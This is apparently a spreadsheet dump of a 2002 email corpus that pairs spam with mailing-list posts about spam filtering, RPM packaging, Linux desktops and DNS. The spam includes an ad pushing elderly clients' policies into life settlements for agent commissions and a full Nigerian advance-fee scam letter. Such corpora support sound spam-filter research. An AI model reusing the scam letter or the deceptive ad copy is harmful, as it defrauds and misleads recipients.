 &lt;head&gt;
 &lt;title&gt;One Sale - Three Commission Streams&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;
 &lt;table width=3D"550" border=3D"1" align=3D"center" cellpadding=3D"0" =
 cellspacing=3D"0" bordercolor=3D"#000000" bgcolor=3D"#FFFFFF"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;
 			&lt;img src=3D"http://iiq.us/Images/vbi/lsa/20020730-101a.gif" alt=3D"An =
 Additional Income Stream" width=3D"550" height=3D"39"&gt;&lt;br&gt;
 			&lt;img src=3D"http://iiq.us/Images/vbi/lsa/20020730-102a.gif" =
 alt=3D"from your current book of business!" width=3D"550" =
 height=3D"43"&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/Images/vbi/lsa/20020730-103a.jpg" =
 width=3D"275" height=3D"206"&gt;&lt;img =
 src=3D"http://iiq.us/Images/vbi/lsa/20020730-104a.jpg" width=3D"275" =
 height=3D"206"&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td&gt;
       &lt;table width=3D"100%" cellpadding=3D"0" cellspacing=3D"0" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"5"&gt;&amp;nbsp;&lt;/td&gt;
           &lt;td width=3D"180"&gt;&lt;img =
 src=3D"http://iiq.us/Images/vbi/lsa/20020730-201a.gif" width=3D"180" =
 height=3D"43"&gt;&lt;/td&gt;
           &lt;td width=3D"180"&gt;&lt;img =
 src=3D"http://iiq.us/Images/vbi/lsa/20020730-201b.gif" width=3D"180" =
 height=3D"43"&gt;&lt;/td&gt;
           &lt;td width=3D"180"&gt;&lt;img =
 src=3D"http://iiq.us/Images/vbi/lsa/20020730-201c.gif" width=3D"180" =
 height=3D"43"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&amp;nbsp;&lt;/td&gt;
           &lt;td valign=3D"top" =
 background=3D"http://iiq.us/Images/vbi/lsa/20020730-203.gif"&gt;
 						&lt;font size=3D"2"&gt;=20
 							&lt;center&gt;
 								&lt;b&gt;Agent Commission:&lt;br&gt;
 								&lt;font color=3D"#FF0000" size=3D"3"&gt;$92,000&lt;/font&gt;&lt;/b&gt;=20
 							&lt;/center&gt;
 							&lt;b&gt;&lt;i&gt;&amp;nbsp;Client:&lt;/i&gt;&lt;/b&gt;&lt;br&gt;
 							&amp;nbsp;87-year-old male&lt;br&gt;
 							&amp;nbsp;82-Year-old female&lt;br&gt;
 							&lt;br&gt;
 							&lt;i&gt;&lt;b&gt;&amp;nbsp;Result:&lt;/b&gt;&lt;/i&gt;&lt;br&gt;
 							&amp;nbsp;$2,300,000 second to die&lt;br&gt;
 							&amp;nbsp;policy, minimal cash value. &amp;nbsp;Policy was no longer&lt;br&gt;
 							&amp;nbsp;required.&amp;nbsp;Insured utilized a&lt;br&gt;
 							&amp;nbsp;life settlement and received&lt;br&gt;
 							&amp;nbsp;$300,000.
 						&lt;/font&gt;
 					&lt;/td&gt;
           &lt;td valign=3D"top" =
 background=3D"http://iiq.us/Images/vbi/lsa/20020730-203.gif"&gt;
 						&lt;font size=3D"2"&gt;
 							&lt;center&gt;
 								&lt;b&gt;Agent Commission:&lt;br&gt;
 								&lt;font color=3D"#FF0000" size=3D"3"&gt;$30,000&lt;/font&gt;&lt;/b&gt;
 							&lt;/center&gt;
 							&lt;b&gt;&lt;i&gt;&amp;nbsp;Client:&lt;/i&gt;&lt;/b&gt;&lt;br&gt;
 							&amp;nbsp;70-year-old male with health complications&lt;br&gt;
 							&lt;br&gt;
 							&lt;i&gt;&lt;b&gt;&amp;nbsp;Result:&lt;/b&gt;&lt;/i&gt;&lt;br&gt;
 							&amp;nbsp;$1,000,000 policy with small&lt;br&gt;
 							&amp;nbsp;cash value. Insured utilized&lt;br&gt;
 							&amp;nbsp;a life settlement and&lt;br&gt;
 							&amp;nbsp;received $300,000.
 						&lt;/font&gt;
 					&lt;/td&gt;
           &lt;td valign=3D"top" =
 background=3D"http://iiq.us/Images/vbi/lsa/20020730-203.gif"&gt;=20
 						&lt;font size=3D"2"&gt;
 							&lt;center&gt;
 								&lt;b&gt;Agent Commission:&lt;br&gt;
 								&lt;font color=3D"#FF0000" size=3D"3"&gt;$90,000&lt;/font&gt;&lt;/b&gt;
 							&lt;/center&gt;&lt;br&gt;
 							&lt;b&gt;&lt;i&gt;&amp;nbsp;Client:&lt;/i&gt;&lt;/b&gt;&lt;br&gt;
 							&amp;nbsp;89-year-old female&lt;br&gt;
 							&lt;br&gt;
 							&lt;i&gt;&lt;b&gt;&amp;nbsp;Result:&lt;/b&gt;&lt;/i&gt;&lt;br&gt;
 							&amp;nbsp;$2,000,000 policy with an&lt;br&gt;
 							&amp;nbsp;annual premium of $110,000.&lt;br&gt;
 							&amp;nbsp;Policy expires at age 95.&lt;br&gt;
 							&amp;nbsp;Insured utilized a life&lt;br&gt;
 							&amp;nbsp;settlement and received&lt;br&gt;
 							&amp;nbsp;$325,000.
 						&lt;/font&gt;
 					&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&amp;nbsp;&lt;/td&gt;
           &lt;td&gt;&lt;img src=3D"http://iiq.us/Images/vbi/lsa/20020730-205.gif" =
 width=3D"180" height=3D"38"&gt;&lt;/td&gt;
           &lt;td&gt;&lt;img src=3D"http://iiq.us/Images/vbi/lsa/20020730-205.gif" =
 width=3D"180" height=3D"38"&gt;&lt;/td&gt;
           &lt;td&gt;&lt;img src=3D"http://iiq.us/Images/vbi/lsa/20020730-205.gif" =
 width=3D"180" height=3D"38"&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td&gt; &lt;img src=3D"http://iiq.us/Images/vbi/lsa/20020730-99.gif" =
 width=3D"8" height=3D"8"&gt;&lt;br&gt;=20
             &lt;center&gt;
               &lt;b&gt;&lt;font size=3D"4"&gt;Multiple opportunities to earn =
 commissions&lt;br&gt;
               from one strategy!&lt;/font&gt;&lt;/b&gt;=20
             &lt;/center&gt;
             &lt;font size=3D"2"&gt;
             &lt;blockquote&gt; If any of your elderly client's health,=20
               personal, or financial needs or circumstances have changed =
 since=20
               the original life policy was issued you have the =
 opportunity to=20
               create an additional income stream with Life =
 Settlements:&lt;/blockquote&gt;
             &lt;b&gt;&lt;img src=3D"http://iiq.us/images/vbi/lsa/20020730-99.gif" =
 width=3D"30" height=3D"147" align=3D"left"&gt;
             &amp;#149; Earn a referral fee from a life settlement =
 transaction.&lt;br&gt;
             &amp;#149; Trailer commission on the policy for the agent of =
 record.&lt;br&gt;
             &amp;#149; Earn investment or annuity commissions from the =
 capital created by &lt;br&gt;
             &amp;nbsp;&amp;nbsp;&amp;nbsp;the life settlement transaction.&lt;br&gt;
             &amp;#149; Earn a commission on new life insurance products that =
 better suit &lt;br&gt;
             &amp;nbsp;&amp;nbsp;&amp;nbsp;your client's current needs.&lt;br&gt;
             &amp;#149; Earn a commission on the conversion if the policy =
 being considered&lt;br&gt;
             &amp;nbsp;&amp;nbsp;&amp;nbsp;is a term product.&lt;br&gt;
             &amp;#149;Earn additional commissions for referring other agents =
 or agencies&lt;br&gt;
             &amp;nbsp;&amp;nbsp;&amp;nbsp;to The Life Settlement =
 Alliance.&lt;/b&gt;&lt;/font&gt;=20
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;img src=3D"http://iiq.us/Images/vbi/lsa/20020730-99.gif" =
 width=3D"8" height=3D"8"&gt;&lt;br&gt;=20
             &lt;b&gt;&lt;font size=3D"2"&gt;Call today for more information!&lt;br&gt;
             &lt;img src=3D"http://iiq.us/Images/vbi/lsa/20020730-3.gif" =
 alt=3D"800-871-9440" width=3D"540" height=3D"64"&gt;=20
             &amp;#8212; or &amp;#8212; &lt;/font&gt;&lt;/b&gt;&lt;br&gt;=20
             &lt;table width=3D"95%" bgcolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#cccccc"&gt;
                       &lt;tr bgcolor=3D"#000066"&gt;=20
                         &lt;td colspan=3D"5" align=3D"center"&gt;&lt;b&gt;&lt;font =
 color=3D"#FFFFFF" size=3D"2"&gt;Please fill out the form below for more =
 information&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt; &lt;input type=3D"text" =
 name=3D"contactname" size=3D"50"&gt;&lt;/td&gt;
                         &lt;td rowspan=3D"5" valign=3D"middle" =
 align=3D"center"&gt;&lt;img src=3D"http://iiq.us/images/q.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt; &lt;input type=3D"text" =
 name=3D"email" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt; &lt;input type=3D"text" =
 name=3D"phone" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;City:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt; &lt;input type=3D"text" =
 name=3D"city" size=3D"20"&gt;&lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;State:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt; &lt;input type=3D"text" =
 name=3D"state" size=3D"2"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%" colspan=3D'3'&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;=20
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"info@vbimail.com"&gt;=20
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"VBI Ad Inquiry"&gt;=20
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;a =
 href=3D"http://www.lsalliance.com"&gt;&lt;img =
 src=3D"http://iiq.us/Images/vbi/lsa/20020730-4.gif" alt=3D"The Life =
 Settlement Alliance" width=3D"254" height=3D"119" border=3D"0"&gt;&lt;/a&gt;&lt;/td&gt;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href=3D"http://www.Insuranceiq.com/optout/"&gt;=20
         http://www.Insuranceiq.com/optout&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
   &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt;&lt;a =
 href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal Notice&lt;/a&gt;&lt;/font&gt;=20
 &lt;/center&gt;
 &lt;/font&gt;=20
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_0007_01C24D19.1DD0A790--
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Aug 09, 2002 at 12:27:25AM -0500, Steve Price wrote:
 &gt; Maybe I'm the only one confused but what you are saying is that you
 &gt; have a spamtrap that receives Bugtraq messages and you are auto-
 &gt; matically reporting them as SPAM only to revoke them shortly there-
 &gt; after???  Either way automatic reporting is a Bad Thing (tm) IMHO.
 To be more precise, automatic reporting is a Good Thing only if there's
 /zero/ possibility of reporting positives falsely (or as close to zero
 as makes no difference in the end).
 cmeclax's example (which incidentally points out a major vulnerability
 of auto-reporting trollboxes) basically says "I'll blindly report as
 spam whatever some other user(s) have reported as spam".  That "blindly"
 part undermines the very purpose of Razor, so I too hope that:
 &gt; if that's what you are doing that it negatively impacts your rating
 &gt; at a near exponential rate with every report/revoke cycle.
 - Adrian
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] Re: fully-public corpus of mail available
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Craig Hughes said:
 &gt; &gt;   - All headers are reproduced in full.  Some address obfuscation has
 &gt; &gt;   taken place; hostnames in some cases have been replaced with
 &gt; &gt;   "spamassassin.taint.org", which should have a valid MX record (if I recall
 &gt; &gt;   correctly).  In &gt; most cases though, the headers appear as they were
 &gt; &gt;   received.
 &gt; 
 &gt; Nope:
 &gt; 
 &gt; [craig@balam craig]$ dig spamassassin.taint.org mx
 I knew there was something about spamassassin.taint.org ;)
 Ah well, that's probably just as good anyway...
 --j.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</si>
  <si>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Blood pressure drugs "slow ageing"
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8512678,1440/
 Date: Not supplied
 Drugs designed to prevent the complications of diabetes may work by slowing 
 accelerated ageing - future versions may delay symptoms of ageing in everyone
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Business Proposal.
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_020F_01C25394.F5A1C4C0
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 BASSEY&amp; ASSOCIATES
 FALOMO, IKOYI.
 LAGOS - NIGERIA.
 FOR YOUR KIND ATTENTION,
 RE: REQUEST FOR MUTUALLY BENEFITTING ENDEAVOUR.
 I humbly crave your indulgence in sending you this mail, if the contents
 does not meet with your personal
 and business ethics, I apologize in advance.
 I am Barrister Williams Bassey ( attorney at law), I represent Alhaji
 Ishmaila Ibrahim Gwarzo's estates. Alhaji Gwarzo was the chief security
 advicer of the then military leader of this country(Nigeria) in the
 person of Late General Sani Abacha who died on the 8th of June 1998. 
 With the advent of a new democratic dispensation in the country under
 the leadership of Gen. Olusegun Obasanjo (Rtd), my client has come under
 severe persecution due to the sensitive position he held in the last
 military regime, presently he is under house arrest restricted only to
 the confines of his village.
 The main purpose of this mail is to intimate you of a business proposal
 that might be of interest to you. My
 client has informed me of the existence of funds deposited with a
 security company abroad. This fund
 came about as part of security votes that were allocated to my client's
 portfolio during his tenure
 as chief security advicer to the then president. What happened was that
 he had part of the funds transferred
 from the vaults of the Central Bank Of Nigeria to this security outfit
 with the aim of purchasing arms and ammunitions for the personal
 security outfit of the then president. But before the purchase could
 take place the president died. My client has deceided to keep this for
 himself as all his properties has been
 confisticated by the present regime. But due to his incarceration he
 cannot travel out and effect the
 change of possession to his benefit.
 I have been mandated by my client to source for a foreign partner that
 can help him facilitate the
 change of possession. The deposit certificate and the code needed for
 the execution of this endeavour are in
 my possession.
 The funds in question is USD33.6M (Thirty-Three Million, Six Hundred
 Thousand United States dollars Only). Should this proposition be of
 interest to you,you can reach me through my e-mail address so that we
 can go 
 through the rudiments of this endeavour.
 I remain most obliged.
 Barrister Williams Bassey (JP).
 Principal Partner.- Bassey &amp; Associates 
 ------=_NextPart_000_020F_01C25394.F5A1C4C0
 Content-Type: text/html
 Content-Transfer-Encoding: 7bit
 &lt;HTML&gt;
 &lt;BODY&gt;
 BASSEY&amp; ASSOCIATES&lt;br&gt;
 FALOMO, IKOYI.&lt;br&gt;
 LAGOS - NIGERIA.&lt;br&gt;
 &lt;br&gt;
 FOR YOUR KIND ATTENTION,&lt;br&gt;
 &lt;br&gt;
 RE: REQUEST FOR MUTUALLY BENEFITTING ENDEAVOUR.&lt;br&gt;
 &lt;br&gt;
 I humbly crave your indulgence in sending you this mail, if the contents does not meet with your personal&lt;br&gt;
 and business ethics, I apologize in advance.&lt;br&gt;
 &lt;br&gt;
 I am Barrister Williams Bassey ( attorney at law), I represent Alhaji Ishmaila Ibrahim Gwarzo&amp;#8217s estates. Alhaji Gwarzo was the chief security advicer of the then military leader of this country(Nigeria) in the person of Late General Sani Abacha who died on the 8th of June 1998. &lt;br&gt;
 &lt;br&gt;
 With the advent of a new democratic dispensation in the country under the leadership of Gen. Olusegun Obasanjo (Rtd), my client has come under severe persecution due to the sensitive position he held in the last military regime, presently he is under house arrest restricted only to the confines of his village.&lt;br&gt;
 &lt;br&gt;
 The main purpose of this mail is to intimate you of a business proposal that might be of interest to you. My&lt;br&gt;
 client has informed me of the existence of funds deposited with a security company abroad. This fund&lt;br&gt;
 came about as part of security votes that were allocated to my client's portfolio during his tenure&lt;br&gt;
 as chief security advicer to the then president. What happened was that he had part of the funds transferred&lt;br&gt;
 from the vaults of the Central Bank Of Nigeria to this security outfit with the aim of purchasing arms and ammunitions for the personal security outfit of the then president. But before the purchase could take place the president died. My client has deceided to keep this for himself as all his properties has been&lt;br&gt;
 confisticated by the present regime. But due to his incarceration he cannot travel out and effect the&lt;br&gt;
 change of possession to his benefit.&lt;br&gt;
 &lt;br&gt;
 I have been mandated by my client to source for a foreign partner that can help him facilitate the&lt;br&gt;
 change of possession. The deposit certificate and the code needed for the execution of this endeavour are in&lt;br&gt;
 my possession.&lt;br&gt;
 &lt;br&gt;
 The funds in question is USD33.6M (Thirty-Three Million, Six Hundred Thousand United States dollars Only). Should this proposition be of interest to you,you can reach me through my e-mail address so that we can go &lt;br&gt;
 through the rudiments of this endeavour.&lt;br&gt;
 &lt;br&gt;
 I remain most obliged.&lt;br&gt;
 &lt;br&gt;
 Barrister Williams Bassey (JP).&lt;br&gt;
 Principal Partner.- Bassey &amp; Associates
 &lt;/BODY&gt;&lt;/HTML&gt;
 &lt;br&gt;&lt;br&gt;
 ------=_NextPart_000_020F_01C25394.F5A1C4C0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Harig, wrote :
 &gt; Actually, I was hoping that you could answer the question "how can we 
 &gt; override an existing switch?"  For example, %configure uses the command-
 &gt; line switch '--prefix'.  How can we override that value?
 &gt; 
 &gt;   %configure ???
 Quite honestly, I thought that the last occurrence was the one that
 counted. I'm almost sure I've already done something like :
 %configure --bindir=%{_sbindir}
 or even
 %configure --sysconfdir=%{_sysconfdir}/%{name}
 Are you sure that it was the first for you? Maybe you're forgetting to also
 override it in %makeinstall like follows :
 %makeinstall bindir=%{buildroot}%{_sbindir}
 or even
 %makeinstall sysconfdir=%{buildroot}%{_sysconfdir}/%{name}
 Is that it?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</si>
  <si>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On Fri, 9 Aug 2002 10:34:23 +0200, Matthias Saou &lt;matthias@egwn.net&gt; wrote:
 &gt; Well, I stand corrected :-)
 &gt; The thing is, I hadn't used gconf-editor yet... and it's exactly what I
 &gt; feared, old "not so good" memories are coming back : It looks exactly like
 &gt; a GNOME RegEdit :-/ Oh well.
 &gt; I still hope that the few missing features I'm still looking for will be
 &gt; added in the next 2.0.x releases, like for example being able to have the
 &gt; panel always under *all* other windows (if you know how to do that, I'm
 &gt; really interested! ;-)).
 &gt; 
     Ya know, I was thinking the same thing.  But there's at least two main 'opposing thumbs' between regedit and gconf:
     1. GConf is written in English, not symbol tables; you can actually READ what the heck you're looking at.
     2. Because it's better-considered, it should be more sound; when the registry gets a wrong value, you may not be able to boot....if GConf is scrogged, you can still have all the underlying power of the OS to keep things running....just call up WindowMaker (or whatever) for the next session until you get it worked out.
     It took me a while to warm up to it...but I *do* like Gconf...
 ------------------------------------------------------------------------
 Brian Fahrlnder              Linux Zealot, Conservative, and Technomad
 Evansville, IN                    My Voyage: http://www.CounterMoon.com
 ICQ  5119262
 ------------------------------------------------------------------------
 "Waddling" into the mainstream?  I suppose...
 http://www.usatoday.com/usatonline/20020805/4333165s.htm
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "J" == James Rogers &lt;jamesr@best.com&gt; writes:
     J&gt; ...  The part that makes the app killer is that you can map all
     J&gt; sorts of data layers on top of their core topological data.
     J&gt; Got it?
 Ah, ok ... so some sample applications come to mind, although none of
 them require wireless and would do with a DVD, but nonetheless ...
 - Forestry: Maps of the terrain are essential in predicting the spread
 of forest fires, esp if this is overlaid with the type of vegetation,
 recent waterfall &amp;c
 - farming/conservation can use the high-resolution terrain to overlay
 water tables or watershed info.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
  Business Advantage through Community Software : http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hi-Mind:Opt-in referencement
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;From Hi-Mind, Assembler of LCD TFT monitors, LCD TV , Plasma.
 THIS IS NOT A SPAM. This is an Opt-In Opt-Out clarification.
 O/ref Uk_05229
 Dear Madam,
 Dear Sir,
 You are receiving this mail as you are professionally involves in Computer, Systems and Display Business.
 We are willing to inform you regularly by e-mail about Hi-Mind's products, opportunities.
 With respect to Opt-In:
 1. You consider  our infos can be usefull: Do not reply to this mail.
 2. You  consider you our infos will be not workable. Please unsubscribe by clicking on infos@hi-mind.com?subject=Please_Unsubscribe
 3. You are curious to know more please click on:
 http://www.hi-mind.com/Promotion/LcdWebPro0402a.htm
 Best regards
 S. C Svatshenk
 Hi-Mind Communication
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] galeon and keyboard focus...
</t>
  </si>
  <si>
    <t xml:space="preserve">ok, in a galeon browser window i open a new window by middle-clicking
 a link.  the window comes up under my mouse.  however, keys i type go to
 the first window.  anyone else have this problem, and did they solve it?
 i use sawfish as my wm with sloppy focus.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</si>
  <si>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[Spambayes] Corpus Collection (Was: Re: Deployment)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 6 Sep 2002, Guido van Rossum wrote:
 &gt;Quite independently from testing and tuning the algorithm, I'd like to
 &gt;think about deployment.
 &gt;
 &gt;Eventually, individuals and postmasters should be able to download a
 &gt;spambayes software distribution, answer a few configuration questions
 &gt;about their mail setup, training and false positives, and install it
 &gt;as a filter.
 &gt;
 &gt;A more modest initial goal might be the production of a tool that can
 &gt;easily be used by individuals (since we're more likely to find
 &gt;individuals willing to risk this than postmasters).
 My impression is that a pre-collected corpus would not fit most individuals
 very well, but each individual (or group?) should collect their own corpus.
 One problem that comes upp immediately: individuals are lazy.
 If I currently get 50 spam and 50 ham a day, and I'll have to
 press the 'delete' button once for each spam, I'll be happy
 to press the 'spam' button instead.  However, if in addition
 have to press a 'ham' button for each ham, it starts to look
 much less like a win to me.  Add the time to install and setup
 the whole machinery, and I'll just keep hitting delete.
 The suggestions so far have been to hook something on the delete
 action, that adds a message to the ham corpus.  I see two problems
 with this: the ham will be a bit skewed; mail that I keep around
 without deleting will not be counted.  Secondly, if I by force of
 habit happen to press the 'delete' key instead of the 'spam' key,
 I'll end up with spam in the ham, anyways.
 I would like to look for a way to deal with spam in the ham.
 The obvious thing to do is to trigger on the 'spam' button,
 and at that time look for messages similar to the deleted one
 in the ham corpus, and simply remove them.  To do this we
 need a way to compare two word count histograms, to see
 how similar they are.  Any ideas ?
 Also, I personally would prefer to not see the spam at all.
 If they get bounced (preferably already in the SMTP),
 false positives become the senders problem, to rewrite
 to remove the spam smell.
 In a well tuned system then, there spam corpus will be much
 smaller than the ham corpus, so it would be possible to be
 slightly over-agressive when clearing potential spam from
 the ham corpus.  This should make it easier to keep it clean.
 Having a good way to remove spam from the ham corpus,
 there's less need to worry about it getting there by mistake,
 and we might as well simply add all messages to the ham corpus,
 that didn't get deleted by the spam filtering.
 It might also be useful to have a way to remove messages from
 the spam corpus, in case of user ooops.
 	/Paul
</t>
  </si>
  <si>
    <t xml:space="preserve">Another one fizzles out...
 http://www.cnn.com/2002/TECH/space/07/29/asteroid.threat.ap/index.html
 ------------------------------------------------------------------------------
 Asteroid impact with Earth ruled out for 2019
 PASADENA, California (AP) -- Astronomers said Monday they have
 determined that a newly discovered, 1.2-mile-wide asteroid will miss
 the Earth in 2019.
 [...]
 ------------------------------------------------------------------------------
 R
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Serial number in hosts file
</t>
  </si>
  <si>
    <t xml:space="preserve">Ray Dermody's [DERMODYR@ITCARLOW.IE] 20 lines of wisdom included:
 &gt; Hi All,
 &gt; The serial number in our hosts files on our DNS server has gone 
 &gt; corrupt e.g. 2002082999999999901 should be 20002082901.
 &gt; Its okay to set this back to todays date but I understand that our 
 &gt; secondary and terninary DNS servers will only update from the master 
 &gt; hosts file if the master host serial number is greater than the current 
 &gt; serial number in the hosts file.
 &gt; Is there any way I can reset this on the secondary and terninary DNS 
 &gt; servers?
 Once you have the serial changed on the master DNS server, remove
 the appropiate zone(s) on your slaves, and refresh your DNS servers.
 Bind has a special case, if you set the serial to '0' I think. DNS &amp;
 Bind should have something on that.
 -- 
   Philip Reynolds        
    RFC Networks          tel: 01 8832063
 www.rfc-networks.ie      fax: 01 8832041
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: yyyy, claim the money you never knew you had
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;body bgcolor="#FFFFFF"&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" bgColor=#005000 border=0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD bgColor=#005000&gt;&lt;IMG height=1 src="http://image.consumerpackage.net/promotions/fmimages/c-pix.gif" width=1 
       border=0&gt; 
       &lt;DIV align=center&gt;
       &lt;CENTER&gt;
       &lt;TABLE width=566 bgColor=#ffffff border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width="100%" bgColor=#ffffff&gt;
             &lt;TABLE cellSpacing=14 cellPadding=6 width=566 bgColor=#ffffff 
             border=0&gt;
               &lt;TBODY&gt;
               &lt;TR&gt;
                 &lt;TD align=middle width="100%" bgColor=#ffffff colSpan=2 
                 height=375&gt;&lt;IMG height=77 
                   src="http://image.consumerpackage.net/promotions/fmimages/isthisyours.gif" width=298 
                   border=0&gt;&lt;BR&gt;&lt;A href="http://track.consumerpackage.net/cgi-bin/a?e=3444431.13"&gt;&lt;IMG 
                   height=252 src="http://image.consumerpackage.net/promotions/fmimages/check.jpg" width=563 
                   border=0&gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG height=10 
                   src="http://image.consumerpackage.net/promotions/fmimages/c-pix.gif" width=1 border=0&gt;&lt;BR&gt;&lt;IMG 
                   height=30 src="http://image.consumerpackage.net/promotions/fmimages/itcouldbe.gif" width=148 
                   border=0&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD vAlign=top width="50%" bgColor=#ffffff&gt;
                   &lt;P align=justify&gt;&lt;FONT color=#666666&gt;&lt;B&gt;&lt;FONT 
                   color=#006666&gt;MarketingonTarget.com&lt;/FONT&gt;&lt;/B&gt; has teamed up 
                   with &lt;/FONT&gt;&lt;A href="http://track.consumerpackage.net/cgi-bin/a?e=3444431.13"&gt;&lt;B&gt;&lt;FONT 
                   color=#006666&gt;FoundMoney&lt;/FONT&gt;&lt;/B&gt;&lt;/A&gt;&lt;FONT 
                   color=#666666&gt; to help you locate and claim your lost CASH.
                   The amount on that check, OR MORE, literally be YOURS for 
                   the claiming. 
                   &amp;nbsp; &lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
                 &lt;TD vAlign=top width="50%" bgColor=#ffffff&gt;
                   &lt;P align=justify&gt;&lt;FONT color=#666666&gt;This is not a contest or a promotion. &lt;/FONT&gt;&lt;A href="http://track.consumerpackage.net/cgi-bin/a?e=3444431.13"&gt;&lt;B&gt;&lt;FONT 
                   color=#006666&gt;FoundMoney&lt;/FONT&gt;&lt;/B&gt;&lt;/A&gt;&lt;FONT 
                   color=#666666&gt; is a search service dedicated to putting 
                   UNCLAIMED MONEY together with its rightful 
